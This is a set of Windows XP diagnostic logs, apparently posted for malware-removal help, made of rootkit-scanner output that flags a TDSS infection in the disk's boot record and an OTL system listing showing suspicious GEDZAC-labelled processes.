11:49:45.0359 1896 NABTSFEC (5b50f1b2a2ed47d560577b221da734db) C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys
11:49:45.0609 1896 NABTSFEC - ok
11:49:45.0656 1896 napagent (0102140028fad045756796e1c685d695) C:\WINDOWS\System32\qagentrt.dll
11:49:45.0968 1896 napagent - ok
11:49:46.0015 1896 NDIS (1df7f42665c94b825322fae71721130d) C:\WINDOWS\system32\drivers\NDIS.sys
11:49:46.0281 1896 NDIS - ok
11:49:46.0312 1896 NdisIP (7ff1f1fd8609c149aa432f95a8163d97) C:\WINDOWS\system32\DRIVERS\NdisIP.sys
11:49:46.0546 1896 NdisIP - ok
11:49:46.0578 1896 NdisTapi (1ab3d00c991ab086e69db84b6c0ed78f) C:\WINDOWS\system32\DRIVERS\ndistapi.sys
11:49:46.0843 1896 NdisTapi - ok
11:49:46.0875 1896 Ndisuio (f927a4434c5028758a842943ef1a3849) C:\WINDOWS\system32\DRIVERS\ndisuio.sys
11:49:47.0125 1896 Ndisuio - ok
11:49:47.0140 1896 NdisWan (edc1531a49c80614b2cfda43ca8659ab) C:\WINDOWS\system32\DRIVERS\ndiswan.sys
11:49:47.0406 1896 NdisWan - ok
11:49:47.0421 1896 NDProxy (6215023940cfd3702b46abc304e1d45a) C:\WINDOWS\system32\drivers\NDProxy.sys
11:49:47.0703 1896 NDProxy - ok
11:49:47.0906 1896 NetBIOS (5d81cf9a2f1a3a756b66cf684911cdf0) C:\WINDOWS\system32\DRIVERS\netbios.sys
11:49:48.0171 1896 NetBIOS - ok
11:49:48.0218 1896 NetBT (74b2b2f5bea5e9a3dc021d685551bd3d) C:\WINDOWS\system32\DRIVERS\netbt.sys
11:49:48.0500 1896 NetBT - ok
11:49:48.0703 1896 NetDDE (b857ba82860d7ff85ae29b095645563b) C:\WINDOWS\system32\netdde.exe
11:49:48.0984 1896 NetDDE - ok
11:49:48.0984 1896 NetDDEdsdm (b857ba82860d7ff85ae29b095645563b) C:\WINDOWS\system32\netdde.exe
11:49:49.0250 1896 NetDDEdsdm - ok
11:49:49.0328 1896 Netlogon (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:49.0593 1896 Netlogon - ok
11:49:49.0781 1896 Netman (13e67b55b3abd7bf3fe7aae5a0f9a9de) C:\WINDOWS\System32\netman.dll
11:49:50.0046 1896 Netman - ok
11:49:50.0171 1896 NetTcpPortSharing (d34612c5d02d026535b3095d620626ae) C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
11:49:50.0203 1896 NetTcpPortSharing - ok
11:49:50.0265 1896 Nla (b4138e99236f0f57d4cf49bae98a0746) C:\WINDOWS\System32\mswsock.dll
11:49:50.0546 1896 Nla - ok
11:49:50.0593 1896 Npfs (3182d64ae053d6fb034f44b6def8034a) C:\WINDOWS\system32\drivers\Npfs.sys
11:49:50.0859 1896 Npfs - ok
11:49:50.0953 1896 Ntfs (78a08dd6a8d65e697c18e1db01c5cdca) C:\WINDOWS\system32\drivers\Ntfs.sys
11:49:51.0281 1896 Ntfs - ok
11:49:51.0281 1896 NtLmSsp (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:51.0531 1896 NtLmSsp - ok
11:49:51.0656 1896 NtmsSvc (156f64a3345bd23c600655fb4d10bc08) C:\WINDOWS\system32\ntmssvc.dll
11:49:51.0953 1896 NtmsSvc - ok
11:49:51.0984 1896 Null (73c1e1f395918bc2c6dd67af7591a3ad) C:\WINDOWS\system32\drivers\Null.sys
11:49:52.0265 1896 Null - ok
11:49:52.0281 1896 NwlnkFlt (b305f3fad35083837ef46a0bbce2fc57) C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
11:49:52.0562 1896 NwlnkFlt - ok
11:49:52.0750 1896 NwlnkFwd (c99b3415198d1aab7227f2c88fd664b9) C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
11:49:53.0000 1896 NwlnkFwd - ok
11:49:53.0125 1896 odserv (84de1dd996b48b05ace31ad015fa108a) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
11:49:53.0187 1896 odserv - ok
11:49:53.0265 1896 ose (5a432a042dae460abe7199b758e8606c) C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
11:49:53.0296 1896 ose - ok
11:49:53.0343 1896 Parport (5575faf8f97ce5e713d108c2a58d7c7c) C:\WINDOWS\system32\drivers\Parport.sys
11:49:53.0640 1896 Parport - ok
11:49:53.0843 1896 PartMgr (beb3ba25197665d82ec7065b724171c6) C:\WINDOWS\system32\drivers\PartMgr.sys
11:49:54.0109 1896 PartMgr - ok
11:49:54.0312 1896 ParVdm (70e98b3fd8e963a6a46a2e6247e0bea1) C:\WINDOWS\system32\drivers\ParVdm.sys
11:49:54.0578 1896 ParVdm - ok
11:49:54.0593 1896 PCI (a219903ccf74233761d92bef471a07b1) C:\WINDOWS\system32\DRIVERS\pci.sys
11:49:54.0843 1896 PCI - ok
11:49:54.0859 1896 PCIDump - ok
11:49:54.0875 1896 PCIIde (ccf5f451bb1a5a2a522a76e670000ff0) C:\WINDOWS\system32\DRIVERS\pciide.sys
11:49:55.0296 1896 PCIIde - ok
11:49:55.0484 1896 Pcmcia (9e89ef60e9ee05e3f2eef2da7397f1c1) C:\WINDOWS\system32\drivers\Pcmcia.sys
11:49:55.0765 1896 Pcmcia - ok
11:49:55.0765 1896 PDCOMP - ok
11:49:55.0781 1896 PDFRAME - ok
11:49:55.0796 1896 PDRELI - ok
11:49:55.0796 1896 PDRFRAME - ok
11:49:55.0953 1896 perc2 (6c14b9c19ba84f73d3a86dba11133101) C:\WINDOWS\system32\DRIVERS\perc2.sys
11:49:56.0203 1896 perc2 - ok
11:49:56.0406 1896 perc2hib (f50f7c27f131afe7beba13e14a3b9416) C:\WINDOWS\system32\DRIVERS\perc2hib.sys
11:49:56.0671 1896 perc2hib - ok
11:49:56.0875 1896 PlugPlay (65df52f5b8b6e9bbd183505225c37315) C:\WINDOWS\system32\services.exe
11:49:56.0906 1896 PlugPlay - ok
11:49:56.0937 1896 PolicyAgent (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:57.0203 1896 PolicyAgent - ok
11:49:57.0390 1896 PptpMiniport (efeec01b1d3cf84f16ddd24d9d9d8f99) C:\WINDOWS\system32\DRIVERS\raspptp.sys
11:49:57.0671 1896 PptpMiniport - ok
11:49:57.0687 1896 ProtectedStorage (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:57.0937 1896 ProtectedStorage - ok
11:49:57.0953 1896 PSched (09298ec810b07e5d582cb3a3f9255424) C:\WINDOWS\system32\DRIVERS\psched.sys
11:49:58.0218 1896 PSched - ok
11:49:58.0234 1896 Ptilink (80d317bd1c3dbc5d4fe7b1678c60cadd) C:\WINDOWS\system32\DRIVERS\ptilink.sys
11:49:58.0484 1896 Ptilink - ok
11:49:58.0515 1896 ql1080 (0a63fb54039eb5662433caba3b26dba7) C:\WINDOWS\system32\DRIVERS\ql1080.sys
11:49:58.0796 1896 ql1080 - ok
11:49:59.0000 1896 Ql10wnt (6503449e1d43a0ff0201ad5cb1b8c706) C:\WINDOWS\system32\DRIVERS\ql10wnt.sys
11:49:59.0265 1896 Ql10wnt - ok
11:49:59.0312 1896 ql12160 (156ed0ef20c15114ca097a34a30d8a01) C:\WINDOWS\system32\DRIVERS\ql12160.sys
11:49:59.0562 1896 ql12160 - ok
11:49:59.0765 1896 ql1240 (70f016bebde6d29e864c1230a07cc5e6) C:\WINDOWS\system32\DRIVERS\ql1240.sys
11:50:00.0734 1896 ql1240 - ok
11:50:00.0750 1896 ql1280 (907f0aeea6bc451011611e732bd31fcf) C:\WINDOWS\system32\DRIVERS\ql1280.sys
11:50:01.0015 1896 ql1280 - ok
11:50:01.0078 1896 RasAcd (fe0d99d6f31e4fad8159f690d68ded9c) C:\WINDOWS\system32\DRIVERS\rasacd.sys
11:50:01.0328 1896 RasAcd - ok
11:50:01.0390 1896 RasAuto (ad188be7bdf94e8df4ca0a55c00a5073) C:\WINDOWS\System32\rasauto.dll
11:50:01.0656 1896 RasAuto - ok
11:50:01.0718 1896 Rasl2tp (11b4a627bc9614b885c4969bfa5ff8a6) C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
11:50:01.0984 1896 Rasl2tp - ok
11:50:02.0015 1896 RasMan (76a9a3cbeadd68cc57cda5e1d7448235) C:\WINDOWS\System32\rasmans.dll
11:50:02.0312 1896 RasMan - ok
11:50:02.0312 1896 RasPppoe (5bc962f2654137c9909c3d4603587dee) C:\WINDOWS\system32\DRIVERS\raspppoe.sys
11:50:02.0578 1896 RasPppoe - ok
11:50:02.0593 1896 Raspti (fdbb1d60066fcfbb7452fd8f9829b242) C:\WINDOWS\system32\DRIVERS\raspti.sys
11:50:02.0875 1896 Raspti - ok
11:50:02.0921 1896 Rdbss (7ad224ad1a1437fe28d89cf22b17780a) C:\WINDOWS\system32\DRIVERS\rdbss.sys
11:50:03.0203 1896 Rdbss - ok
11:50:03.0234 1896 RDPCDD (4912d5b403614ce99c28420f75353332) C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
11:50:03.0500 1896 RDPCDD - ok
11:50:03.0703 1896 rdpdr (15cabd0f7c00c47c70124907916af3f1) C:\WINDOWS\system32\DRIVERS\rdpdr.sys
11:50:03.0984 1896 rdpdr - ok
11:50:04.0015 1896 RDPWD (6728e45b66f93c08f11de2e316fc70dd) C:\WINDOWS\system32\drivers\RDPWD.sys
11:50:04.0281 1896 RDPWD - ok
11:50:04.0328 1896 RDSessMgr (3c37bf86641bda977c3bf8a840f3b7fa) C:\WINDOWS\system32\sessmgr.exe
11:50:04.0593 1896 RDSessMgr - ok
11:50:04.0640 1896 redbook (f828dd7e1419b6653894a8f97a0094c5) C:\WINDOWS\system32\DRIVERS\redbook.sys
11:50:04.0906 1896 redbook - ok
11:50:04.0968 1896 RemoteAccess (7e699ff5f59b5d9de5390e3c34c67cf5) C:\WINDOWS\System32\mprdim.dll
11:50:05.0234 1896 RemoteAccess - ok
11:50:05.0453 1896 RpcLocator (aaed593f84afa419bbae8572af87cf6a) C:\WINDOWS\system32\locator.exe
11:50:05.0718 1896 RpcLocator - ok
11:50:05.0781 1896 RpcSs (6b27a5c03dfb94b4245739065431322c) C:\WINDOWS\System32\rpcss.dll
11:50:05.0828 1896 RpcSs - ok
11:50:05.0875 1896 RSUSBSTOR (7ffa9821b1c5e0e0667e0a2685cfb89f) C:\WINDOWS\system32\Drivers\RtsUStor.sys
11:50:05.0921 1896 RSUSBSTOR - ok
11:50:05.0968 1896 RSVP (471b3f9741d762abe75e9deea4787e47) C:\WINDOWS\system32\rsvp.exe
11:50:06.0234 1896 RSVP - ok
11:50:06.0234 1896 Rts516xIR - ok
11:50:06.0437 1896 SamSs (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:50:06.0703 1896 SamSs - ok
11:50:07.0046 1896 SamsungAllShareV2.0 (328100af2efd951eab657384ec361b6f) C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe
11:50:07.0078 1896 SamsungAllShareV2.0 - ok
11:50:07.0125 1896 SCardSvr (86d007e7a654b9a71d1d7d856b104353) C:\WINDOWS\System32\SCardSvr.exe
11:50:07.0406 1896 SCardSvr - ok
11:50:07.0437 1896 Schedule (0a9a7365a1ca4319aa7c1d6cd8e4eafa) C:\WINDOWS\system32\schedsvc.dll
11:50:07.0703 1896 Schedule - ok
11:50:07.0734 1896 Secdrv (90a3935d05b494a5a39d37e71f09a677) C:\WINDOWS\system32\DRIVERS\secdrv.sys
11:50:07.0828 1896 Secdrv - ok
11:50:07.0859 1896 seclogon (cbe612e2bb6a10e3563336191eda1250) C:\WINDOWS\System32\seclogon.dll
11:50:08.0125 1896 seclogon - ok
11:50:08.0156 1896 SENS (7fdd5d0684eca8c1f68b4d99d124dcd0) C:\WINDOWS\system32\sens.dll
11:50:08.0437 1896 SENS - ok
11:50:08.0453 1896 Serial (cca207a8896d4c6a0c9ce29a4ae411a7) C:\WINDOWS\system32\drivers\Serial.sys
11:50:08.0718 1896 Serial - ok
11:50:08.0750 1896 Sfloppy (8e6b8c671615d126fdc553d1e2de5562) C:\WINDOWS\system32\drivers\Sfloppy.sys
11:50:09.0031 1896 Sfloppy - ok
11:50:09.0093 1896 SharedAccess (83f41d0d89645d7235c051ab1d9523ac) C:\WINDOWS\System32\ipnathlp.dll
11:50:09.0390 1896 SharedAccess - ok
11:50:09.0437 1896 ShellHWDetection (1926899bf9ffe2602b63074971700412) C:\WINDOWS\System32\shsvcs.dll
11:50:09.0687 1896 ShellHWDetection - ok
11:50:09.0703 1896 Simbad - ok
11:50:09.0750 1896 SimpleSlideShowServer (1980fe1f5a32067dad1d8776b63c2669) C:\Program Files\Samsung\AllShare\AllShareSlideShowService.exe
11:50:09.0765 1896 SimpleSlideShowServer - ok
11:50:09.0796 1896 sisagp (6b33d0ebd30db32e27d1d78fe946a754) C:\WINDOWS\system32\DRIVERS\sisagp.sys
11:50:10.0046 1896 sisagp - ok
11:50:10.0093 1896 SLIP (866d538ebe33709a5c9f5c62b73b7d14) C:\WINDOWS\system32\DRIVERS\SLIP.sys
11:50:10.0328 1896 SLIP - ok
11:50:10.0468 1896 SNP2UVC (c792610f7d2009352721c1ae38da0619) C:\WINDOWS\system32\DRIVERS\snp2uvc.sys
11:50:10.0656 1896 SNP2UVC - ok
11:50:10.0796 1896 Sparrow (83c0f71f86d3bdaf915685f3d568b20e) C:\WINDOWS\system32\DRIVERS\sparrow.sys
11:50:10.0906 1896 Sparrow - ok
11:50:10.0937 1896 splitter (ab8b92451ecb048a4d1de7c3ffcb4a9f) C:\WINDOWS\system32\drivers\splitter.sys
11:50:11.0171 1896 splitter - ok
11:50:11.0234 1896 Spooler (d8e14a61acc1d4a6cd0d38aebac7fa3b) C:\WINDOWS\system32\spoolsv.exe
11:50:11.0500 1896 Spooler - ok
11:50:11.0546 1896 sr (76bb022c2fb6902fd5bdd4f78fc13a5d) C:\WINDOWS\system32\DRIVERS\sr.sys
11:50:11.0656 1896 sr - ok
11:50:11.0703 1896 srservice (3805df0ac4296a34ba4bf93b346cc378) C:\WINDOWS\system32\srsvc.dll
11:50:11.0828 1896 srservice - ok
11:50:11.0921 1896 Srv (3bb03f2ba89d2be417206c373d2af17c) C:\WINDOWS\system32\DRIVERS\srv.sys
11:50:11.0984 1896 Srv - ok
11:50:12.0031 1896 SSDPSRV (0a5679b3714edab99e357057ee88fca6) C:\WINDOWS\System32\ssdpsrv.dll
11:50:12.0140 1896 SSDPSRV - ok
11:50:12.0203 1896 stisvc (8bad69cbac032d4bbacfce0306174c30) C:\WINDOWS\system32\wiaservc.dll
11:50:12.0515 1896 stisvc - ok
11:50:12.0562 1896 streamip (77813007ba6265c4b6098187e6ed79d2) C:\WINDOWS\system32\DRIVERS\StreamIP.sys
11:50:12.0828 1896 streamip - ok
11:50:12.0843 1896 swenum (3941d127aef12e93addf6fe6ee027e0f) C:\WINDOWS\system32\DRIVERS\swenum.sys
11:50:13.0109 1896 swenum - ok
11:50:13.0140 1896 swmidi (8ce882bcc6cf8a62f2b2323d95cb3d01) C:\WINDOWS\system32\drivers\swmidi.sys
11:50:13.0421 1896 swmidi - ok
11:50:13.0421 1896 SwPrv - ok
11:50:13.0609 1896 symc810 (1ff3217614018630d0a6758630fc698c) C:\WINDOWS\system32\DRIVERS\symc810.sys
11:50:13.0859 1896 symc810 - ok
11:50:13.0890 1896 symc8xx (070e001d95cf725186ef8b20335f933c) C:\WINDOWS\system32\DRIVERS\symc8xx.sys
11:50:14.0140 1896 symc8xx - ok
11:50:14.0343 1896 sym_hi (80ac1c4abbe2df3b738bf15517a51f2c) C:\WINDOWS\system32\DRIVERS\sym_hi.sys
11:50:14.0593 1896 sym_hi - ok
11:50:14.0609 1896 sym_u3 (bf4fab949a382a8e105f46ebb4937058) C:\WINDOWS\system32\DRIVERS\sym_u3.sys
11:50:14.0859 1896 sym_u3 - ok
11:50:14.0968 1896 SynTP (5c3e900f41426a372de60675afc8aa07) C:\WINDOWS\system32\DRIVERS\SynTP.sys
11:50:14.0984 1896 SynTP - ok
11:50:15.0031 1896 sysaudio (8b83f3ed0f1688b4958f77cd6d2bf290) C:\WINDOWS\system32\drivers\sysaudio.sys
11:50:15.0296 1896 sysaudio - ok
11:50:15.0500 1896 SysmonLog (c7abbc59b43274b1109df6b24d617051) C:\WINDOWS\system32\smlogsvc.exe
11:50:15.0750 1896 SysmonLog - ok
11:50:15.0796 1896 TapiSrv (3cb78c17bb664637787c9a1c98f79c38) C:\WINDOWS\System32\tapisrv.dll
11:50:16.0078 1896 TapiSrv - ok
11:50:16.0109 1896 Tcpip (93ea8d04ec73a85db02eb8805988f733) C:\WINDOWS\system32\DRIVERS\tcpip.sys
11:50:16.0406 1896 Tcpip - ok
11:50:16.0437 1896 TDPIPE (6471a66807f5e104e4885f5b67349397) C:\WINDOWS\system32\drivers\TDPIPE.sys
11:50:16.0703 1896 TDPIPE - ok
11:50:16.0718 1896 TDTCP (c56b6d0402371cf3700eb322ef3aaf61) C:\WINDOWS\system32\drivers\TDTCP.sys
11:50:16.0968 1896 TDTCP - ok
11:50:17.0000 1896 TermDD (88155247177638048422893737429d9e) C:\WINDOWS\system32\DRIVERS\termdd.sys
11:50:17.0281 1896 TermDD - ok
11:50:17.0500 1896 TermService (ff3477c03be7201c294c35f684b3479f) C:\WINDOWS\System32\termsrv.dll
11:50:17.0781 1896 TermService - ok
11:50:17.0796 1896 Themes (1926899bf9ffe2602b63074971700412) C:\WINDOWS\System32\shsvcs.dll
11:50:18.0062 1896 Themes - ok
11:50:18.0093 1896 TosIde (f2790f6af01321b172aa62f8e1e187d9) C:\WINDOWS\system32\DRIVERS\toside.sys
11:50:18.0343 1896 TosIde - ok
11:50:18.0375 1896 TrkWks (55bca12f7f523d35ca3cb833c725f54e) C:\WINDOWS\system32\trkwks.dll
11:50:18.0640 1896 TrkWks - ok
11:50:18.0953 1896 uagqecsvc (c49adf4fdcc2c1493197b2df528c9485) C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe
11:50:18.0984 1896 uagqecsvc - ok
11:50:19.0015 1896 Udfs (5787b80c2e3c5e2f56c2a233d91fa2c9) C:\WINDOWS\system32\drivers\Udfs.sys
11:50:19.0296 1896 Udfs - ok
11:50:19.0500 1896 ultra (1b698a51cd528d8da4ffaed66dfc51b9) C:\WINDOWS\system32\DRIVERS\ultra.sys
11:50:19.0593 1896 ultra - ok
11:50:19.0640 1896 UMWdf (c81b8635dee0d3ef5f64b3dd643023a5) C:\WINDOWS\system32\wdfmgr.exe
11:50:19.0703 1896 UMWdf - ok
11:50:19.0734 1896 Update (402ddc88356b1bac0ee3dd1580c76a31) C:\WINDOWS\system32\DRIVERS\update.sys
11:50:20.0062 1896 Update - ok
11:50:20.0109 1896 upnphost (1ebafeb9a3fbdc41b8d9c7f0f687ad91) C:\WINDOWS\System32\upnphost.dll
11:50:20.0218 1896 upnphost - ok
11:50:20.0234 1896 UPS (05365fb38fca1e98f7a566aaaf5d1815) C:\WINDOWS\System32\ups.exe
11:50:20.0515 1896 UPS - ok
11:50:20.0734 1896 usbccgp (173f317ce0db8e21322e71b7e60a27e8) C:\WINDOWS\system32\DRIVERS\usbccgp.sys
11:50:20.0984 1896 usbccgp - ok
11:50:20.0984 1896 USBCCID - ok
11:50:21.0031 1896 usbehci (65dcf09d0e37d4c6b11b5b0b76d470a7) C:\WINDOWS\system32\DRIVERS\usbehci.sys
11:50:21.0296 1896 usbehci - ok
11:50:21.0328 1896 usbhub (1ab3cdde553b6e064d2e754efe20285c) C:\WINDOWS\system32\DRIVERS\usbhub.sys
11:50:21.0609 1896 usbhub - ok
11:50:21.0781 1896 usbprint (a717c8721046828520c9edf31288fc00) C:\WINDOWS\system32\DRIVERS\usbprint.sys
11:50:22.0046 1896 usbprint - ok
11:50:22.0093 1896 USBSTOR (a32426d9b14a089eaa1d922e0c5801a9) C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
11:50:22.0343 1896 USBSTOR - ok
11:50:22.0359 1896 usbuhci (26496f9dee2d787fc3e61ad54821ffe6) C:\WINDOWS\system32\DRIVERS\usbuhci.sys
11:50:22.0796 1896 usbuhci - ok
11:50:22.0968 1896 usbvideo (63bbfca7f390f4c49ed4b96bfb1633e0) C:\WINDOWS\system32\Drivers\usbvideo.sys
11:50:23.0218 1896 usbvideo - ok
11:50:23.0250 1896 VgaSave (0d3a8fafceacd8b7625cd549757a7df1) C:\WINDOWS\System32\drivers\vga.sys
11:50:23.0500 1896 VgaSave - ok
11:50:23.0531 1896 viaagp (754292ce5848b3738281b4f3607eaef4) C:\WINDOWS\system32\DRIVERS\viaagp.sys
11:50:23.0781 1896 viaagp - ok
11:50:23.0796 1896 ViaIde (3b3efcda263b8ac14fdf9cbdd0791b2e) C:\WINDOWS\system32\DRIVERS\viaide.sys
11:50:24.0046 1896 ViaIde - ok
11:50:24.0062 1896 VolSnap (4c8fcb5cc53aab716d810740fe59d025) C:\WINDOWS\system32\drivers\VolSnap.sys
11:50:24.0328 1896 VolSnap - ok
11:50:24.0375 1896 VSS (7a9db3a67c333bf0bd42e42b8596854b) C:\WINDOWS\System32\vssvc.exe
11:50:24.0500 1896 VSS - ok
11:50:24.0531 1896 W32Time (54af4b1d5459500ef0937f6d33b1914f) C:\WINDOWS\system32\w32time.dll
11:50:24.0812 1896 W32Time - ok
11:50:24.0843 1896 Wanarp (e20b95baedb550f32dd489265c1da1f6) C:\WINDOWS\system32\DRIVERS\wanarp.sys
11:50:25.0093 1896 Wanarp - ok
11:50:25.0156 1896 Wdf01000 (bbcfeab7e871cddac2d397ee7fa91fdc) C:\WINDOWS\system32\Drivers\wdf01000.sys
11:50:25.0234 1896 Wdf01000 - ok
11:50:25.0234 1896 WDICA - ok
11:50:25.0281 1896 wdmaud (6768acf64b18196494413695f0c3a00f) C:\WINDOWS\system32\drivers\wdmaud.sys
11:50:25.0546 1896 wdmaud - ok
11:50:25.0593 1896 WebClient (77a354e28153ad2d5e120a5a8687bc06) C:\WINDOWS\System32\webclnt.dll
11:50:25.0875 1896 WebClient - ok
11:50:25.0968 1896 winmgmt (2d0e4ed081963804ccc196a0929275b5) C:\WINDOWS\system32\wbem\WMIsvc.dll
11:50:26.0250 1896 winmgmt - ok
11:50:26.0468 1896 WmdmPmSN (a477391b7a8b0a0daabadb17cf533a4b) C:\WINDOWS\system32\MsPMSNSv.dll
11:50:26.0500 1896 WmdmPmSN - ok
11:50:26.0531 1896 WmiAcpi (c42584fd66ce9e17403aebca199f7bdb) C:\WINDOWS\system32\DRIVERS\wmiacpi.sys
11:50:26.0781 1896 WmiAcpi - ok
11:50:26.0984 1896 WmiApSrv (e0673f1106e62a68d2257e376079f821) C:\WINDOWS\system32\wbem\wmiapsrv.exe
11:50:27.0234 1896 WmiApSrv - ok
11:50:27.0265 1896 WpdUsb (c1b3d9d75c3fb735f5fa3a5806aded57) C:\WINDOWS\system32\Drivers\wpdusb.sys
11:50:27.0312 1896 WpdUsb - ok
11:50:27.0328 1896 WS2IFSL (6abe6e225adb5a751622a9cc3bc19ce8) C:\WINDOWS\System32\drivers\ws2ifsl.sys
11:50:27.0593 1896 WS2IFSL - ok
11:50:27.0656 1896 wscsvc (7c278e6408d1dce642230c0585a854d5) C:\WINDOWS\system32\wscsvc.dll
11:50:27.0937 1896 wscsvc - ok
11:50:27.0968 1896 WSTCODEC (c98b39829c2bbd34e454150633c62c78) C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS
11:50:28.0234 1896 WSTCODEC - ok
11:50:28.0421 1896 wuauserv (35321fb577cdc98ce3eb3a3eb9e4610a) C:\WINDOWS\system32\wuauserv.dll
11:50:28.0703 1896 wuauserv - ok
11:50:28.0750 1896 WZCSVC (81dc3f549f44b1c1fff022dec9ecf30b) C:\WINDOWS\System32\wzcsvc.dll
11:50:29.0046 1896 WZCSVC - ok
11:50:29.0078 1896 xmlprov (295d21f14c335b53cb8154e5b1f892b9) C:\WINDOWS\System32\xmlprov.dll
11:50:29.0328 1896 xmlprov - ok
11:50:29.0531 1896 MBR (0x1B8) (5c616939100b85e558da92b899a0fc36) \Device\Harddisk0\DR0
11:50:29.0609 1896 \Device\Harddisk0\DR0 ( TDSS File System ) - warning
11:50:29.0609 1896 \Device\Harddisk0\DR0 - detected TDSS File System (1)
11:50:29.0625 1896 Boot (0x1200) (cc838f099443892519cb342248c6e643) \Device\Harddisk0\DR0\Partition0
11:50:29.0625 1896 \Device\Harddisk0\DR0\Partition0 - ok
11:50:29.0625 1896 ============================================================
11:50:29.0625 1896 Scan finished
11:50:29.0625 1896 ============================================================
11:50:29.0781 0368 Detected object count: 1
11:50:29.0781 0368 Actual detected object count: 1
11:51:59.0250 0368 \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
11:51:59.0250 0368 \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip


OTL:
OTL logfile created on: 13/05/2012 12:06:57 PM - Run 1
OTL by OldTimer - Version 3.2.42.3 Folder = C:\Documents and Settings\Annie\My Documents\Downloads
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 6.0.2900.5512)
Locale: 00001009 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy

1013.99 Mb Total Physical Memory | 587.01 Mb Available Physical Memory | 57.89% Memory free
2.38 Gb Paging File | 2.07 Gb Available in Paging File | 86.93% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 139.04 Gb Total Space | 15.29 Gb Free Space | 11.00% Space Free | Partition Type: NTFS

Computer Name: FELIX | User Name: Annie | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 90 Days

========== Processes (SafeList) ==========

PRC - [2012/05/13 11:59:18 | 000,595,456 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Annie\My Documents\Downloads\OTL.exe
PRC - [2012/05/12 20:31:28 | 000,030,721 | ---- | M] (GEDZAC) -- C:\WINDOWS\system32\sendi.exe
PRC - [2012/05/12 20:14:05 | 000,017,409 | ---- | M] (GEDZAC LABS) -- C:\WINDOWS\system32\regsrv.exe
PRC - [2012/02/14 19:03:14 | 024,246,216 | ---- | M] (Dropbox, Inc.) -- C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe
PRC - [2012/01/19 00:58:06 | 000,149,904 | ---- | M] (Microsoft ® Corporation) -- C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe
PRC - [2011/11/27 06:22:14 | 000,856,064 | ---- | M] (Lee-Soft.com) -- C:\Program Files\ViStart\ViStart.exe
PRC - [2009/02/12 00:20:52 | 000,862,728 | ---- | M] (Dritek System Inc.) -- C:\Program Files\Launch Manager\LManager.exe
PRC - [2008/07/03 15:58:22 | 000,094,208 | ---- | M] (sonix) -- C:\WINDOWS\PLFSetL.exe
PRC - [2008/04/15 17:54:42 | 000,354,840 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
PRC - [2008/04/15 17:54:40 | 000,178,712 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
PRC - [2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe


========== Modules (No Company Name) ==========

MOD - [2003/06/07 01:30:08 | 000,057,344 | ---- | M] () -- C:\Program Files\Launch Manager\PowerUtl.dll


========== Win32 Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- %SystemRoot%\System32\hidserv.dll -- (HidServ)
SRV - File not found [On_Demand | Stopped] -- %SystemRoot%\System32\appmgmts.dll -- (AppMgmt)
SRV - [2012/03/02 17:00:26 | 000,025,504 | ---- | M] (Samsung Electronics Co., Ltd.) [Auto | Stopped] -- C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe -- (SamsungAllShareV2.0)
SRV - [2012/03/02 17:00:20 | 000,027,584 | ---- | M] (Samsung Electronics Co., Ltd.) [On_Demand | Stopped] -- C:\Program Files\Samsung\AllShare\AllShareSlideShowService.exe -- (SimpleSlideShowServer)
SRV - [2012/01/19 00:58:06 | 000,149,904 | ---- | M] (Microsoft ® Corporation) [Auto | Running] -- C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe -- (uagqecsvc)
SRV - [2008/04/15 17:54:42 | 000,354,840 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe -- (IAANTMON) Intel®


========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- -- (WDICA)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Rts5161ccid.sys -- (USBCCID)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Rts516xIR.sys -- (Rts516xIR)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRELI)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDFRAME)
